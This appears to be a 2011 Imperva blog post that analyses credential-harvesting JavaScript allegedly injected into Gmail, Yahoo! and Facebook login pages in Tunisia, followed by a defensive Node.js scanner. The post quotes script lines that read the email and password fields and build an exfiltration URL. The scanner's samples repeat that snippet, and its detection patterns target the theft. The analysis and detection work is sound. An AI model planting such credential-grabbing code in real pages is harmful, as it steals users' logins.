January 25, 2011

It’s only January and we’ve just witnessed a first: cyber insecurity bringing down a government. The government of Tunisia, a WikiLeaks target, has been under severe scrutiny for corruption ever since WikiLeaks exposed some dodgy practices.

The Tech Herald highlighted how the Tunisian government conducted a “cyber retaliation,” in which usernames and passwords were harvested, presumably by the government, to monitor and/or manipulate citizen communications. Facebook, Gmail and Yahoo! were affected.

Imperva’s Application Defense Center (ADC) obtained the pages allegedly injected by the Tunisian government:

Gmail - http://pastebin.com/G6iEjENK
Yahoo! - http://pastebin.com/M5CbYTWj
Facebook - http://pastebin.com/1JsrcZBf

Sorry, but this entry is about to get quite geeky. For those of you who enjoy the anatomy of a hack, though, this is quite interesting. If you’re not a geek, basically these are pictures of a hacker’s hand in the cookie jar.


The method is the same in all three pages: the credential-stealing hAAAQ3d() JavaScript function is added to the usual form post.

Compare the original Gmail form submission:

[Screenshot: the original Gmail form submission]

With the injected one (note the highlight):

[Screenshot: the injected Gmail form submission, with the injected code highlighted]

Here's the actual hAAAQ3d script:

[Screenshot: the hAAAQ3d credential-harvesting script]

The hAAAQ3d script grabs the username and password:

  • The username is stored in the us3r (= user) variable: var us3r = frm.Email.value;
  • The password is stored in the pa55 (= pass) variable: var pa55 = frm.Passwd.value;

The attack script then sends the credentials (after scrambling them with the h6h function) to the nonexistent URL "http://www.google.com/wo0dh3ad" (= woodhead) as parameters:

var url = "http://www.google.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55);

Since the Tunisian government controls all internet traffic in the country, it can log every request to this URL and so easily obtain the credentials.
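For defenders, the two artifacts described above are easy to look for: an injected inline script on the login page that reads the Passwd field and builds a URL to the bogus /wo0dh3ad path, and (on a proxy or web log) requests to that path carrying the q/u/p parameter triple. The following Node.js scanner is an added example, not code from the Imperva post or from the harvested pages; the indicator strings (hAAAQ3d, wo0dh3ad, the u= and p= parameters, frm.Passwd.value) come from the post, while the HTML page and the log lines are constructed samples.

```javascript
// Added example (not from the Imperva post): flag the injected-script
// indicators the post describes, in page source and in proxy log lines.
// Indicator strings are taken from the post; sample data is constructed.

const INDICATORS = [
  { name: 'harvest-function', re: /\bhAAAQ3d\s*\(/ },          // injected function name
  { name: 'exfil-path',       re: /\/wo0dh3ad\?/ },            // bogus collection URL
  { name: 'password-read',    re: /\.Passwd\.value/ },         // reads the password field
  { name: 'cred-params',      re: /[?&]u=[\s\S]*?[?&]p=/ },    // u= and p= parameters built together
];

// Pull the bodies of every non-empty inline <script> element out of a page.
function extractInlineScripts(html) {
  const scripts = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (m[1].trim() !== '') scripts.push(m[1]);
  }
  return scripts;
}

// One finding per inline script that matches at least one indicator.
function scanPage(html) {
  const findings = [];
  extractInlineScripts(html).forEach((body, index) => {
    const hits = INDICATORS.filter(ind => ind.re.test(body)).map(ind => ind.name);
    if (hits.length > 0) findings.push({ script: index, indicators: hits });
  });
  return findings;
}

// Parse a constructed proxy log line "timestamp client METHOD url status" and
// flag a request to the exfil path, or any request carrying u= and p= together.
function flagLogLine(line) {
  const parts = line.trim().split(/\s+/);
  if (parts.length < 5) return null;
  let url;
  try { url = new URL(parts[3]); } catch (e) { return null; }
  const reasons = [];
  if (url.pathname === '/wo0dh3ad') reasons.push('exfil-path');
  if (url.searchParams.has('u') && url.searchParams.has('p')) reasons.push('cred-params');
  return reasons.length > 0 ? { client: parts[1], host: url.hostname, reasons } : null;
}

// Constructed sample: a clean login page, and the same page with the injected
// script (only the lines quoted in the post; no sending logic).
const CLEAN_PAGE = `<html><body>
<form name="gaia_loginform" action="https://www.google.com/accounts/ServiceLoginAuth" method="post">
<input name="Email"><input name="Passwd" type="password"><input type="submit">
</form>
<script>function onSubmitForm(){return true;}</script>
</body></html>`;

const INJECTED_PAGE = CLEAN_PAGE.replace('</body>', `<script>
function hAAAQ3d() {
  var frm = document.forms[0];
  var us3r = frm.Email.value;
  var pa55 = frm.Passwd.value;
  var url = "http://www.google.com/wo0dh3ad?q=" + r5t(5) + "&u=" + h6h(us3r) + "&p=" + h6h(pa55);
}
</script>
</body>`);

// Constructed proxy log lines: a normal login, the exfil request, a search.
const LOG_LINES = [
  '2011-01-05T10:21:58Z 10.0.0.5 POST https://www.google.com/accounts/ServiceLoginAuth 302',
  '2011-01-05T10:22:01Z 10.0.0.5 GET http://www.google.com/wo0dh3ad?q=a1b2c&u=ZXhhbXBsZQ&p=c2VjcmV0 404',
  '2011-01-05T10:22:09Z 10.0.0.7 GET http://www.google.com/search?q=imperva 200',
];

console.log('clean page:', JSON.stringify(scanPage(CLEAN_PAGE)));
console.log('injected page:', JSON.stringify(scanPage(INJECTED_PAGE)));
LOG_LINES.forEach(l => console.log('log:', JSON.stringify(flagLogLine(l))));
```

The page scan is the check a site operator or a user-side tool can run on the HTML actually delivered to the browser, which is where an in-path injection like this shows up; the log check is the network-side view, where a burst of requests to a path the legitimate site never serves, each carrying a u= and p= pair, stands out even when the parameter values are scrambled.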

Posted by Imperva Blogger at 02:54:52 PM